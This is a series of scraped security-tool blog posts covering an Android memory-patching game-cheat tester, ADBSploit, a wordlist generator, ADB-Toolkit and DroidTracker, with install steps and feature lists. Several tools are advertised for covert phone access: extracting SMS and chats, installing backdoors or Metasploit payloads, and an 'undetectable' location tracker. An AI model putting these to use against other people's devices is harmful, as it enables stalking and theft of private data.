<p>Apk-medit is a <a href="https://www.kitploit.com/search/label/Memory" target="_blank" title="memory">memory</a> search and patch tool for debuggable apk without root & ndk. It was created for mobile game security testing.</p><span><a name='more'></a></span><p><br /></p><span style="font-size: large;"><b>Motivation</b></span><br /> <p>Memory <a href="https://www.kitploit.com/search/label/Modification" target="_blank" title="modification">modification</a> is the easiest way to cheat in games, it is one of the items to be checked in the security test. There are also cheat tools that can be used casually like GameGuardian. However, there were no tools available for non-root device and CUI. So I made it as a security <a href="https://www.kitploit.com/search/label/Testing" target="_blank" title="testing">testing</a> tool.</p> <br /><span style="font-size: large;"><b>Demo</b></span><br /> <p>This is a demo that uses apk-medit to clear a game that requires one million taps to clear.</p> <p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-RqXEBotLg98/X40OqtZc7LI/AAAAAAAAUE4/pikPCjcpYe08SkjPCkqsQIndoT_duv_vgCNcBGAsYHQ/s1312/terminal.gif" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="785" data-original-width="1312" height="382" src="https://1.bp.blogspot.com/-RqXEBotLg98/X40OqtZc7LI/AAAAAAAAUE4/pikPCjcpYe08SkjPCkqsQIndoT_duv_vgCNcBGAsYHQ/w640-h382/terminal.gif" width="640" /></a></div><p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-Mm4L1zJz_zI/X40OwBk72_I/AAAAAAAAUE8/aO_46pZ3Jk0KvH8w6t_NFqexioHTUsmBwCNcBGAsYHQ/s658/demo-app.gif" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="658" data-original-width="320" height="320" src="https://1.bp.blogspot.com/-Mm4L1zJz_zI/X40OwBk72_I/AAAAAAAAUE8/aO_46pZ3Jk0KvH8w6t_NFqexioHTUsmBwCNcBGAsYHQ/s320/demo-app.gif" /></a></div><p><br /></p><span style="font-size: large;"><b>Installation</b></span><br /> <p>Download the <a href="https://www.kitploit.com/search/label/Binary" target="_blank" title="binary">binary</a> from <a href="https://github.com/aktsk/apk-medit/releases/" rel="nofollow" target="_blank" title="GitHub Releases">GitHub Releases</a>, please push the binary in <code>/data/local/tmp/</code> on an <a href="https://www.kitploit.com/search/label/Android" target="_blank" title="android">android</a> device.</p> <pre><code>$ adb push medit /data/local/tmp/medit<br />medit: 1 file pushed. 29.0 MB/s (3135769 bytes in 0.103s)<br /></code></pre> <br /><b>How to Build</b><br /> <p>You can build with make command. It requires a go compiler. After the build is complete, if adb is connected, it pushes the built binary in <code>/data/local/tmp/</code> on an android device.</p> <pre><code>$ make<br />GOOS=linux GOARCH=arm64 GOARM=7 go build -o medit<br />/bin/sh -c "adb push medit /data/local/tmp/medit"<br />medit: 1 file pushed. 23.7 MB/s (3131205 bytes in 0.126s)<br /></code></pre> <br /><span style="font-size: large;"><b>Usage</b></span><br /> <p>Use the <code>run-as</code> command to read files used by the target app, so apk-medit can only be used with apps that have the debuggable attribute enabled. To enable the debuggable attribute, open <code>AndroidManifest.xml</code>, add the following xml attribute in application xml node:</p> <pre><code>android:debuggable="true"<br /></code></pre> <p>You can also use <a href="https://github.com/aktsk/apkutil" rel="nofollow" target="_blank" title="aktsk/apkutil">aktsk/apkutil</a> to easily enable the debuggable attribute without editing <code>AndroidManifest.xml</code>, it is useful.</p> <pre><code>$ apkutil debuggable <target-apk-name>.apk<br /></code></pre> <p>After running the <code>run-as</code> command, directory is automatically changed. So copy <code>medit</code> from <code>/data/local/tmp/</code>. Running <code>medit</code> launches an interactive prompt.</p> <pre><code>$ adb shell<br />$ pm list packages # to check <target-package-name><br />$ run-as <target-package-name><br />$ cp /data/local/tmp/medit ./medit<br />$ ./medit<br /></code></pre> <br /><b>Commands</b><br /> <p>Here are the commands available in an interactive prompt.</p> <br /><b>find</b><br /> <p>Search the specified integer on memory.</p> <pre><code>> find 999982<br />Search UTF-8 String...<br />Target Value: 999982([57 57 57 57 56 50])<br />Found: 0!<br />------------------------<br />Search Word...<br />parsing 999982: value out of range<br />------------------------<br />Search Double Word...<br />Target Value: 999982([46 66 15 0])<br />Found: 1!<br />Address: 0xe7021f70<br /></code></pre> <p>You can also specify datatype such as string, word, dword, qword.</p> <pre><code>> find dword 999996<br />Search Double Word...<br />Target Value: 999996([60 66 15 0])<br />Found: 1!<br />Address: 0xe7021f70<br /></code></pre> <br /><b>filter</b><br /> <p>Filter previous search results that match the current search results.</p> <pre><code>> filter 993881<br />Check previous results of searching dword...<br />Target Value: 993881([89 42 15 0])<br />Found: 1!<br />Address: 0xe7021f70<br /></code></pre> <br /><b>patch</b><br /> <p>Write the specified value on the address found by search.</p> <pre><code>> patch 10<br />Successfully patched!<br /></code></pre> <br /><b>ps</b><br /> <p>Find the target process and if there is only one, specify it as the target. <code>ps</code> runs automatically on startup.</p> <pre><code>> ps<br />Package: jp.aktsk.tap1000000, PID: 4398<br />Target PID has been set to 4398.<br /></code></pre> <br /><b>attach</b><br /> <p>If target pid set by <code>ps</code>, attach to the target process, stop all processes in the app by ptrace.</p> <pre><code>> attach<br />Target PID: 4398<br />Attached TID: 4398<br />Attached TID: 4405<br />Attached TID: 4407<br />Attached TID: 4408<br />Attached TID: 4410<br />Attached TID: 4411<br />Attached TID: 4412<br />Attached TID: 4413<br />Attached TID: 4414<br />Attached TID: 4415<br />Attached TID: 4418<br />Attached TID: 4420<br />Attached TID: 4424<br />Attached TID: 4429<br />Attached TID: 4430<br />Attached TID: 4436<br />Attached TID: 4437<br />Attached TID: 4438<br />Attached TID: 4439<br />Attached TID: 4440<br />Attached TID: 4441<br />Attached TID: 4442<br /></code></pre> <p>If target pid is not set, it can be specified on the command line.</p> <pre><code>> attach <pid><br /></code></pre> <br /><b>detach</b><br /> <p>Detach from the attached process.</p> <pre><code>> detach<br />Detached TID: 4398<br />Detached TID: 4405<br />Detached TID: 4407<br />Detached TID: 4408<br />Detached TID: 4410<br />Detached TID: 4411<br />Detached TID: 4412<br />Detached TID: 4413<br />Detached TID: 4414<br />Detached TID: 4415<br />Detached TID: 4418<br />Detached TID: 4420<br />Detached TID: 4424<br />Detached TID: 4429<br />Detached TID: 4430<br />Detached TID: 4436<br />Detached TID: 4437<br />Detached TID: 4438<br />Detached TID: 4439<br />Detached TID: 4440<br />Detached TID: 4441<br />Detached TID: 4442<br /></code></pre> <br /><b>dump</b><br /> <p>Display memory dump like hexdump.</p> <pre><code>> dump 0xf0aee000 0xf0aee300<br />Address range: 0xf0aee000 - 0xf0aee300<br />----------------------------------------------<br />00000000 34 32 20 61 6e 73 77 65 72 20 28 74 6f 20 6c 69 |42 answer (to li|<br />00000010 66 65 20 74 68 65 20 75 6e 69 76 65 72 73 65 20 |fe the universe |<br />00000020 65 74 63 7c 33 29 0a 33 31 34 20 70 69 0a 31 30 |etc|3).314 pi.10|<br />00000030 30 33 20 61 75 64 69 74 64 20 28 61 76 63 7c 33 |03 auditd (avc|3|<br />00000040 29 0a 31 30 30 34 20 63 68 61 74 74 79 20 28 64 |).1004 chatty (d|<br />00000050 72 6f 70 70 65 64 7c 33 29 0a 31 30 30 35 20 74 |ropped|3).1005 t|<br />00000060 61 67 5f 64 65 66 20 28 74 61 67 7c 31 29 2c 28 |ag_def (tag|1),(|<br />00000070 6e 61 6d 65 7c 33 29 2c 28 66 6f 72 6d 61 74 7c |name|3),(format||<br />00000080 33 29 0a 31 30 30 36 20 6c 69 62 6c 6f 67 20 28 |3).1006 liblog (|<br />00000090 64 72 6f 70 70 65 64 7c 31 29 0a 32 37 31 38 20 |dropped|1).2718 |<br />000000a0 65 0a 32 37 31 39 20 63 6f 6e 66 69 67 75 72 61 |e.2719 configura|<br />000000b0 74 69 6f 6e 5f 63 68 61 6e 67 65 64 20 28 63 6f |tion_changed (co|<br />000000c0 6e 66 69 67 20 6d 61 73 6b 7c 31 7c 35 29 0a 32 |nfig mask|1|5).2|<br />000000d0 37 32 30 20 73 79 6e 63 20 28 69 64 7c 33 29 2c |720 sync (id|3),|<br />000000e0 28 65 76 65 6e 74 7c 31 7c 35 29 2c 28 73 6f 75 |(event|1|5),(sou|<br />000000f0 72 63 65 7c 31 7c 35 29 2c 28 61 63 63 6f 75 6e |rce|1|5),(accoun|<br /></code></pre> <br /><b>exit</b><br /> <p>To exit medit, use the <code>exit</code> command or <code>Ctrl-D</code>.</p> <pre><code>> exit<br />Bye!<br /></code></pre> <br /><span style="font-size: large;"><b>Test</b></span><br /> <p>You can run test codes with make command.</p> <pre><code>$ make test<br /></code></pre> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/aktsk/apk-medit" rel="nofollow" target="_blank" title="Download Apk-Medit">Download Apk-Medit</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-22986641684380403202020-08-21T08:30:00.000-04:002020-08-21T08:30:07.002-04:00ADBSploit - A Python Based Tool For Exploiting And Managing Android Devices Via ADB<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-CGHR9xSx3fE/Xzn0EXwWJSI/AAAAAAAATfE/qSon4XhvNGEALRXLirQcYbwoNnWo1_hbgCNcBGAsYHQ/s1600/adbsploit_1_adbsploit.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="136" data-original-width="430" src="https://1.bp.blogspot.com/-CGHR9xSx3fE/Xzn0EXwWJSI/AAAAAAAATfE/qSon4XhvNGEALRXLirQcYbwoNnWo1_hbgCNcBGAsYHQ/s1600/adbsploit_1_adbsploit.png" /></a></div>
<br />
A python based tool for exploiting and managing <a href="https://www.kitploit.com/search/label/Android" target="_blank" title="Android">Android</a> devices via ADB<br />
<br />
<span style="font-size: large;"><b>Currently on development</b></span><br />
<ul>
<li>Screenrecord</li>
<li>Stream Screenrecord</li>
<li>Extract Contacts</li>
<li>Extract SMS</li>
<li>Extract Messasing App Chats WhatsApp/Telegram/Line</li>
<li>Install Backdoor</li>
<li>And more...</li>
</ul>
<a name='more'></a><br />
<span style="font-size: large;"><b>Installation</b></span><br />
<pre><code># First Download or clone repo
git clone https://github.com/mesquidar/adbsploit.git
# Move to the directory
cd adbsploit
# Install it
python setup.py install
# Excute
adbsploit
# Enjoy!!</code></pre>
<br />
<b>Requirements</b><br />
<ul>
<li>Python 3.X</li>
</ul>
<br />
<span style="font-size: large;"><b>Usage</b></span><br />
<ul>
<li>Execute the commad: devices</li>
<li>Then select the device with: select</li>
<li>You can connect to device using the command: connect</li>
<li>Type help for more information</li>
</ul>
<br />
<span style="font-size: x-large;"><b>Functionalities</b></span><br />
<br />
<span style="font-size: large;"><b>v0.2</b></span><br />
<br />
<b>Added:</b><br />
<ul>
<li>Fixed setup and installation</li>
<li>Extract Contacts</li>
<li>Extract SMS</li>
<li>Send SMS</li>
<li>Recovery Mode</li>
<li>Fastboot Mode</li>
<li>Device Info</li>
<li>Kill Process</li>
</ul>
<br />
<span style="font-size: large;"><b>v0.1</b></span><br />
<ul>
<li>List Devices</li>
<li>Connect Devices</li>
<li>TCPIP</li>
<li>Forward Ports</li>
<li>Airplane Managment</li>
<li>Wifi Managment</li>
<li>Sound Control</li>
<li>List/Info Apps</li>
<li>WPA Supplicant Extraction</li>
<li>Install/Uninstall Apps</li>
<li>Shutdown/Reboot</li>
<li>Logs</li>
<li>Start/Stop/Clear Apps</li>
<li>Show Inet/MAC</li>
<li>Battery Status</li>
<li>Netstat</li>
<li>Check/Unlock/Lock Screen</li>
<li>Turn On/Off Screen</li>
<li>Swipe Screen</li>
<li>Screencapture</li>
<li>Send Keyevent</li>
<li>Open Browser URL</li>
<li>Process List</li>
<li>Dump Meminfo/Hierarchy</li>
</ul>
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/mesquidar/adbsploit" rel="nofollow" target="_blank" title="Download Adbsploit">Download Adbsploit</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-40219866576235010642020-07-22T17:30:00.000-04:002020-07-22T17:30:03.802-04:00Lazybee - Wordlist Generator Tool for Termux<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-VHrO3vAsLfo/Xwu7hTHcj-I/AAAAAAAATI8/QHSCQ83sLvAYs2zDIYPxjmTRJIpfYfFZgCNcBGAsYHQ/s1600/lazybee_5.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="451" data-original-width="720" height="400" src="https://1.bp.blogspot.com/-VHrO3vAsLfo/Xwu7hTHcj-I/AAAAAAAATI8/QHSCQ83sLvAYs2zDIYPxjmTRJIpfYfFZgCNcBGAsYHQ/s640/lazybee_5.jpeg" width="640" /></a></div>
<br />
Lazybee tool is a python based script from which you can generate random <a href="https://www.kitploit.com/search/label/Wordlist" target="_blank" title="wordlist">wordlist</a> for brutefocre attacks. This tool has a unique features like wordlist generating time calculation and direct .txt saving in current directory. This tool works on both rooted <a href="https://www.kitploit.com/search/label/Android" target="_blank" title="Android">Android</a> device and Non-rooted Android device.<br />
<a name='more'></a><br />
<span style="font-size: large;"><b>lazybee is available for</b></span><br />
<ul>
<li>Termux</li>
</ul>
<br />
<span style="font-size: large;"><b>Installation and usage guide</b></span><br />
<pre><code>$ apt-get update -y</code></pre>
<pre><code>$ apt-get upgrade -y</code></pre>
<pre><code>$ pkg install python -y </code></pre>
<pre><code>$ pkg install python2 -y</code></pre>
<pre><code>$ pkg install git -y</code></pre>
<pre><code>$ pip install requests</code></pre>
<pre><code>$ pip install random</code></pre>
<pre><code>$ ls</code></pre>
<pre><code>$ git clone https://github.com/noob-hackers/lazybee</code></pre>
<pre><code>$ ls</code></pre>
<pre><code>$ cd lazybee</code></pre>
<pre><code>$ ls</code></pre>
<pre><code>$ python2 lazybee.py</code></pre>
ex:- Enter the number of characters: 8<br />
Name your wordlist wit (.txt) extensions: pass.txt<br />
WOW... you just created wordlist in hackers way.<br />
<br />
<span style="font-size: large;"><b>Warning</b></span><br />
<em><strong>This tool is only for educational purpose. If you use this tool for other purposes except education we will not be responsible in such cases.</strong></em><br />
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/noob-hackers/lazybee" rel="nofollow" target="_blank" title="Download Lazybee">Download Lazybee</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-35160848998571926442020-07-21T17:30:00.000-04:002020-07-21T17:30:07.716-04:00ADB-Toolkit - Tool for testing your Android device<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-ZhDQhHwsaOA/Xwu5ZG8t3MI/AAAAAAAATIU/n_9vtY394s0IvlEGvpBotNlxsqZ-whLeQCNcBGAsYHQ/s1600/ADB-Toolkit_7_git1.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="861" data-original-width="849" height="640" src="https://1.bp.blogspot.com/-ZhDQhHwsaOA/Xwu5ZG8t3MI/AAAAAAAATIU/n_9vtY394s0IvlEGvpBotNlxsqZ-whLeQCNcBGAsYHQ/s640/ADB-Toolkit_7_git1.jpeg" width="631" /></a></div>
<br />
<strong>ADB-Toolkit is a BASH Script with 28 options and an METASPLOIT Section which has 6 options which is made to do easy <a href="https://www.kitploit.com/search/label/Penetration%20Testing" target="_blank" title="penetration testing">penetration testing</a> in Android Device.</strong> You can do preety much any thing with this script and test your android device is it safe or not. This script is made with the help of ADB (Android Debug Bridge) it's an tool which is used for the developers for debugging the android device but as we know every thing has it's two side a good and a bad and i'm not telling you to do bad things but be don't do illegal things or FBI will find you.<br />
Note : I'm not responsible for any thing you do to anyone with this tool this does not come under my responsibilty.<br />
<strong>METASPLOIT SECTION :- </strong>This section consists of scripts which are related to metasploit payload and you can create an payload and install it and launch it without even touching the phone and you know the power of Metasploit.<br />
<a name='more'></a><br />
<span style="font-size: x-large;"><b>Changelogs</b></span><br />
<br />
<span style="font-size: large;"><b>Changelog v2.32</b></span><br />
<pre><code>Added vesion checking code
Really big bug fixes
Wiki in made</code></pre>
<br />
<span style="font-size: large;"><b>Changelog V2.3</b></span><br />
<pre><code>Added multi device support, now 3
Added support to Arch, Fedora, Centos
Added option to restart the ADB server or not in the beginning of the script
Added Option to clear screen when a specfic option is done executing
Fix the Exit option (Not Working)
Simplified the Remote connection establishment
Fix 100's of Bugs
Specified the directories for pulling the data
Make the script executable from any where in shell (Fixed)</code></pre>
<br />
<span style="font-size: large;"><b>Changelog V2.1</b></span><br />
<pre><code>Added <a href="https://www.kitploit.com/search/label/Metasploit" target="_blank" title="Metasploit">Metasploit</a> Section
Added option to restart the ADB server or not in the beginning of the script
Added 7 more options :-
1. COPY ALL DEVICE STORAGE
2. COPY A SPECIFIED FILE OR FOLDER
3. PUT A FILE IN VICTIMS DEVICE
4. LAUNCH AN APPLICATION
5. CHECK IS PHONE ROOTED OR NOT
6. HANG THE PHONE ( Rooted Phone )
7. SEND SMS FROM THE PHONE
Fixed the Remote connection not establishing
Make the script executable from any where in shell</code></pre>
<br />
<span style="font-size: x-large;"><b>Prerequisite</b></span><br />
Before using this tool you must enable Usb-Debugging from the devloper settings from the Android setting and then you are good to go.<br />
<div>
<pre><code>1. Go to settings
2. Go to About device/tablet
3. Tap Build Number 7 times
4. Developer options will occur
5. Go to Developer options
6. Search for Usb <a href="https://www.kitploit.com/search/label/Debugging" target="_blank" title="Debugging">Debugging</a> & Install via USB
7. Turn those settings on</code></pre>
</div>
<br />
<span style="font-size: x-large;"><b>Installation</b></span><br />
guys i suggest please <a href="https://www.kitploit.com/search/label/Reinstall" target="_blank" title="reinstall">reinstall</a> the toolkit or git pull it for every new releases<br />
<div>
<pre><code>git clone https://github.com/ASHWIN990/ADB-Toolkit.git
cd ADB-Toolkit
sudo chmod +x install.sh
sudo ./install.sh -i "or" sudo bash install.sh -i</code></pre>
</div>
<br />
<span style="font-size: x-large;"><b>Usage</b></span><br />
<div>
<pre><code>sudo ./ADB-Toolkit.sh
or you can do
sudo bash ADB-Toolkit.sh
or you can also do
sudo adb-toolkit any where in shell</code></pre>
</div>
<br />
<span style="font-size: x-large;"><b>ADB-Toolkit Screenshot</b></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-ZhDQhHwsaOA/Xwu5ZG8t3MI/AAAAAAAATIU/n_9vtY394s0IvlEGvpBotNlxsqZ-whLeQCNcBGAsYHQ/s1600/ADB-Toolkit_7_git1.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="861" data-original-width="849" height="640" src="https://1.bp.blogspot.com/-ZhDQhHwsaOA/Xwu5ZG8t3MI/AAAAAAAATIU/n_9vtY394s0IvlEGvpBotNlxsqZ-whLeQCNcBGAsYHQ/s640/ADB-Toolkit_7_git1.jpeg" width="631" /></a></div>
<br />
<span style="font-size: x-large;"><b>Metasploit Section Screenshot</b></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-pfs7BeANEB0/Xwu5puyKTaI/AAAAAAAATIg/D6-gZsb4vTk37w6eLQUvwdZr2m9buWubACNcBGAsYHQ/s1600/ADB-Toolkit_8_git2.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="662" data-original-width="777" height="544" src="https://1.bp.blogspot.com/-pfs7BeANEB0/Xwu5puyKTaI/AAAAAAAATIg/D6-gZsb4vTk37w6eLQUvwdZr2m9buWubACNcBGAsYHQ/s640/ADB-Toolkit_8_git2.jpeg" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-r-REMY_KrQw/Xwu5pYkBUBI/AAAAAAAATIY/EMlswJZ3fvIMAx8KEPw9kH9f2aC8Cj3wwCNcBGAsYHQ/s1600/ADB-Toolkit_9_git3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="469" data-original-width="886" height="338" src="https://1.bp.blogspot.com/-r-REMY_KrQw/Xwu5pYkBUBI/AAAAAAAATIY/EMlswJZ3fvIMAx8KEPw9kH9f2aC8Cj3wwCNcBGAsYHQ/s640/ADB-Toolkit_9_git3.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-PRatO2XhPmI/Xwu5pibBKOI/AAAAAAAATIc/jvs276crOl0aHFCN-2KRxHbgqCLnLtGwACNcBGAsYHQ/s1600/ADB-Toolkit_10_git4.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="426" data-original-width="890" height="306" src="https://1.bp.blogspot.com/-PRatO2XhPmI/Xwu5pibBKOI/AAAAAAAATIc/jvs276crOl0aHFCN-2KRxHbgqCLnLtGwACNcBGAsYHQ/s640/ADB-Toolkit_10_git4.jpeg" width="640" /></a></div>
<br />
<span style="font-size: x-large;"><b>Contributing</b></span><br />
Pull requests are welcome. For major changes, please open an issue first to discuss what you would like to change.<br />
<br />
<span style="font-size: x-large;"><b>Author</b></span><br />
<ul>
<li><strong>ASHWINI SAHU</strong> - <em>WHOLE WORK</em> - (<a href="https://github.com/ASHWIN990" rel="nofollow" target="_blank" title="https://github.com/ASHWIN990">https://github.com/ASHWIN990</a>)</li>
</ul>
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/ASHWIN990/ADB-Toolkit" rel="nofollow" target="_blank" title="Download ADB-Toolkit">Download ADB-Toolkit</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-19121531973713787942020-06-20T17:30:00.000-04:002020-06-20T17:30:13.906-04:00DroidTracker - Script To Generate An Android App To Track Location In Real Time<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-9uVj8129BG4/Xt8bhf6QPqI/AAAAAAAASyo/ko4fxhnnr18oDHkUHaN-pGjqyKdVpozHQCNcBGAsYHQ/s1600/DroidTracker_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="760" data-original-width="688" height="640" src="https://1.bp.blogspot.com/-9uVj8129BG4/Xt8bhf6QPqI/AAAAAAAASyo/ko4fxhnnr18oDHkUHaN-pGjqyKdVpozHQCNcBGAsYHQ/s640/DroidTracker_1.png" width="579" /></a></div>
<br />
Script to generate an <a href="https://www.kitploit.com/search/label/Android%20App" target="_blank" title="Android App">Android App</a> to track location in real time<br />
<br />
<b>Features:</b><br />
<ul>
<li>Custom App Name</li>
<li>2 <a href="https://www.kitploit.com/search/label/Port%20Forwarding" target="_blank" title="Port Forwarding">Port Forwarding</a> options (Ngrok or using SSH <a href="https://www.kitploit.com/search/label/Tunneling" target="_blank" title="Tunneling">Tunneling</a> with Serveo.net)</li>
<li>Obfuscated URL by Tinyurl</li>
<li>Fully Undetectable</li>
</ul>
<a name='more'></a><br />
<span style="font-size: large;"><b>Legal disclaimer:</b></span><br />
Usage of DroidTracker for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program<br />
<br />
<b>Auto Install:</b><br />
<pre><code># bash install.sh</code></pre>
<br />
<b>Installing on <a href="https://www.kitploit.com/search/label/Kali" target="_blank" title="Kali">Kali</a> Linux:</b><br />
<pre><code>Install dependencies:
# apt-get update
# apt-get install default-jdk apksigner
For x86:
# apt-get install libc6-dev-i386 lib32z1
For AMD64:
# apt-get install lib32z1 lib32ncurses6 lib32stdc++6
Download SDK-Tools:
# wget https://dl.google.com/android/repository/sdk-tools-linux-4333796.zip
#mkdir -p $HOME/Android/Sdk
# unzip sdk-tools-linux* -d $HOME/Android/Sdk
Install SDKMAN
# curl -s "https://get.sdkman.io" | bash
# source "$HOME/.sdkman/bin/sdkman-init.sh"
# echo "Y" | sdk install java 8.0.191-oracle
# sdk use java 8.0.191-oracle
# sdk install gradle 2.14.1
# sdk use gradle 2.14.1
# echo "y" | $HOME/Android/Sdk/tools/bin/sdkmanager "platforms;android-25" "build-tools;25.0.1" "extras;google;m2repository" "extras;android;m2repository"
# git clone https://github.com/thelinuxchoice/droidtracker
# cd droidtracker
# bash droidtracker.sh</code></pre>
<br />
<span style="font-size: small;"><b>Author: <a href="https://github.com/thelinuxchoice/DroidTracker" rel="nofollow" target="_blank" title="https://github.com/thelinuxchoice/DroidTracker">https://github.com/thelinuxchoice/DroidTracker</a></b></span><br />
<span style="font-size: small;"><b>IG: <a href="https://www.instagram.com/linux_choice" rel="nofollow" target="_blank" title="https://www.instagram.com/linux_choice">https://www.instagram.com/linux_choice</a></b></span><br />
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/thelinuxchoice/DroidTracker" rel="nofollow" target="_blank" title="Download DroidTracker">Download DroidTracker</a></span></b></div>
Unknownnoreply@blogger.com